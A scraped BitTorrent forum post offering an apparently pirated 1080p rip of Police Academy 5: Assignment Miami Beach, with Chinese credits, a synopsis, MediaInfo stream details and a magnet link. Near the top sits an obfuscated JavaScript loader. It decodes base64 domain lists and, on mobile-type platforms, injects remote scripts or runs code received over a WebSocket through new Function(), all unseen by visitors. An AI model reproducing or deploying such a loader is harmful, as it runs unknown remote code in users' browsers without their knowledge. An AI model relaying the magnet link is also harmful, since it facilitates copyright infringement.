警察学校5:迈阿密之旅[双语字幕]迅雷下载.Police.Academy.5.Assignment.Miami.Beach.1988.1080p 8.15GB

版主小s 21天前 219

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 警察学校5:迈阿密之旅 / 学警放暑假 / 金牌警校军第五集:迈阿密特别勤务

◎片 名 Police Academy 5: Assignment Miami Beach

◎年 代 1988

◎产 地 美国

◎类 别 喜剧 / 犯罪

◎语 言 英语

◎上映日期 1988-03-18

◎IMDb评分 4.7/10 from 32793 users

◎IMDb链接 https://www.imdb.com/title/tt0095882

◎豆瓣评分 7.0/10 from 1472 users

◎豆瓣链接 https://movie.douban.com/subject/1294644/

◎片 长 90分钟

◎导 演 艾伦·迈尔森 Alan Myerson

◎编 剧 尼尔·伊斯雷尔 Neal Israel / 帕特·普罗夫特 Pat Proft / Stephen Curwick / 贝瑞·布劳斯坦 Barry W. Blaustein / 吉恩·昆塔诺 Gene Quintano / 大卫·谢菲尔德 David Sheffield

◎主 演 布巴·史密斯 Bubba Smith

大卫·格拉夫 David Graf

迈克尔·温斯洛 Michael Winslow

莱斯利·伊斯特布鲁克 Leslie Easterbrook

马里昂·拉姆塞 Marion Ramsey

珍妮特·琼斯 Janet Jones

兰斯·金赛 Lance Kinsey

马特·麦考伊 Matt McCoy

G.W.拜利 G.W. Bailey

乔治·盖恩斯 George Gaynes

勒内·奥贝尔若努瓦 Rene Auberjonois

乔治·R·罗伯逊 George R. Robertson

Tab Thacker

詹姆斯·汉普顿 James Hampton

Jerry Lazarus

宾斯·莫洛克 Beans Morocco

Kathryn Graf

艾伦·迈尔森 Alan Myerson

Jeff Gillen

Ed Kovens

Tom Kouchalakos

Ruben Rabasa

斯科特·维内尔 Scott Weinger

胡里奥·奥斯卡·门乔索 Julio Oscar Mechoso

Joni Siani

Jeff Breslauer

Anthony Bruce

Michael J. Carnevale

Anthony Correa

保罗·马斯兰斯基 Paul Maslansky

杰夫·莫尔多万 Jeff Moldovan

杰瑞·奥康奈尔 Jerry O'Connell

◎标 签 喜剧 | 美国 | 美国电影 | 警察学校 | 搞笑 | 1988 | 经典 | 电影

◎简 介

心里阴暗的哈里队长深夜潜入局长办公室,找到了拉萨雷校长年届退休的证据,哈里志满意得,认为这是顶替拉萨雷的绝好机会。另一方面,校长又送走了一批毕业生,在典礼上,官方宣布了拉萨雷即将退休的消息,而一生兢兢业业的校长也得到了在迈阿密颁发的十年来最佳警官的荣誉。拉萨雷校长携高塔(Bubba Smith 饰)、卡伦、泰克布雷、琼斯(Michael Winslow 饰)等一干优秀警校毕业生,与哈里一同赶往迈阿密参加警方盛典。在出机场时,拉萨雷误将窃贼团伙装有赃物珠宝的手提袋拿走,无法向委托人交差的窃贼们只有在24小时内从拉萨雷处娶回珠宝才有活命的希望。参加盛典的警校精英们在迈阿密享受着美妙的阳光,不知危险正在暗中逼近……

  1. General

  2. Unique ID : 27392758322748898744614633645362863516 (0x149BA74208207B24BED3DCC866BB5D9C)

  3. Complete name : Police.Academy.5.Assignment.Miami.Beach.1988.1080p.BluRay.x264.DTS.1.0-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 8.15 GiB

  7. Duration : 1 h 29 min

  8. Overall bit rate : 13.0 Mb/s

  9. Movie name : Police Academy 5: Assignment: Miami Beach

  10. Encoded date : UTC 2021-07-05 03:11:10

  11. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 1 h 29 min

  25. Bit rate : 12.1 Mb/s

  26. Width : 1 920 pixels

  27. Height : 1 080 pixels

  28. Display aspect ratio : 16:9

  29. Frame rate mode : Constant

  30. Frame rate : 23.976 (24000/1001/53354) FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.244

  36. Stream size : 7.62 GiB (94%)

  37. Writing library : x264 core 161 r3018+53 18a1d6c t_mod_New [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=9 / lookahead_threads=2 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=20.0000 / qcomp=0.65 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.70 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Language : English

  40. Default : Yes

  41. Forced : No


  42. Audio

  43. ID : 2

  44. ID in the original source medium : 4352 (0x1100)

  45. Format : DTS

  46. Format/Info : Digital Theater Systems

  47. Codec ID : A_DTS

  48. Duration : 1 h 29 min

  49. Bit rate mode : Constant

  50. Bit rate : 768 kb/s

  51. Channel(s) : 1 channel

  52. Channel layout : C

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Bit depth : 24 bits

  56. Compression mode : Lossy

  57. Stream size : 494 MiB (6%)

  58. Language : English

  59. Default : Yes

  60. Forced : No

  61. Original source medium : Blu-ray


  62. Text #1

  63. ID : 3

  64. ID in the original source medium : 4621 (0x120D)

  65. Format : PGS

  66. Muxing mode : zlib

  67. Codec ID : S_HDMV/PGS

  68. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  69. Duration : 1 h 26 min

  70. Bit rate : 37.8 kb/s

  71. Count of elements : 1818

  72. Stream size : 23.3 MiB (0%)

  73. Title : chs&eng

  74. Language : Chinese

  75. Default : Yes

  76. Forced : No

  77. Original source medium : Blu-ray


  78. Text #2

  79. ID : 4

  80. ID in the original source medium : 4622 (0x120E)

  81. Format : PGS

  82. Muxing mode : zlib

  83. Codec ID : S_HDMV/PGS

  84. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  85. Duration : 1 h 26 min

  86. Bit rate : 38.0 kb/s

  87. Count of elements : 1818

  88. Stream size : 23.5 MiB (0%)

  89. Title : cht&eng

  90. Language : Chinese

  91. Default : Yes

  92. Forced : No

  93. Original source medium : Blu-ray


  94. Text #3

  95. ID : 5

  96. ID in the original source medium : 4623 (0x120F)

  97. Format : PGS

  98. Muxing mode : zlib

  99. Codec ID : S_HDMV/PGS

  100. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  101. Duration : 1 h 26 min

  102. Bit rate : 21.9 kb/s

  103. Count of elements : 1818

  104. Stream size : 13.6 MiB (0%)

  105. Title : chs

  106. Language : Chinese

  107. Default : Yes

  108. Forced : No

  109. Original source medium : Blu-ray


  110. Text #4

  111. ID : 6

  112. ID in the original source medium : 4624 (0x1210)

  113. Format : PGS

  114. Muxing mode : zlib

  115. Codec ID : S_HDMV/PGS

  116. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  117. Duration : 1 h 26 min

  118. Bit rate : 22.2 kb/s

  119. Count of elements : 1818

  120. Stream size : 13.7 MiB (0%)

  121. Title : cht

  122. Language : Chinese

  123. Default : Yes

  124. Forced : No

  125. Original source medium : Blu-ray


  126. Text #5

  127. ID : 7

  128. ID in the original source medium : 4609 (0x1201)

  129. Format : PGS

  130. Muxing mode : zlib

  131. Codec ID : S_HDMV/PGS

  132. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  133. Duration : 1 h 28 min

  134. Bit rate : 35.0 kb/s

  135. Count of elements : 2416

  136. Stream size : 22.3 MiB (0%)

  137. Language : English

  138. Default : Yes

  139. Forced : No

  140. Original source medium : Blu-ray


  141. Menu

  142. 00:00:00.000 : Chapter 01

  143. 00:05:50.975 : Chapter 02

  144. 00:10:08.899 : Chapter 03

  145. 00:15:20.794 : Chapter 04

  146. 00:17:34.261 : Chapter 05

  147. 00:21:20.946 : Chapter 06

  148. 00:27:09.169 : Chapter 07

  149. 00:32:03.379 : Chapter 08

  150. 00:36:24.098 : Chapter 09

  151. 00:41:45.419 : Chapter 10

  152. 00:45:23.137 : Chapter 11

  153. 00:47:56.456 : Chapter 12

  154. 00:50:14.511 : Chapter 13

  155. 00:56:23.338 : Chapter 14

  156. 00:57:39.456 : Chapter 15

  157. 01:04:02.713 : Chapter 16

  158. 01:10:59.255 : Chapter 17

  159. 01:15:28.273 : Chapter 18

  160. 01:20:07.260 : Chapter 19

  161. 01:21:57.662 : Chapter 20

  162. 01:24:17.177 : Chapter 21

  163. 01:27:24.572 : Chapter 22




TAGS 犯罪 喜剧

磁力链:
  • magnet:?xt=urn:btih:E0BDCC128C065A5087367BFF7AFD4A3306CB5326
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回